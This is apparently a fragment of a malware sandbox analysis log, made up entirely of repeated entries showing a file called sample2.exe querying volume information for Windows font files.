Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
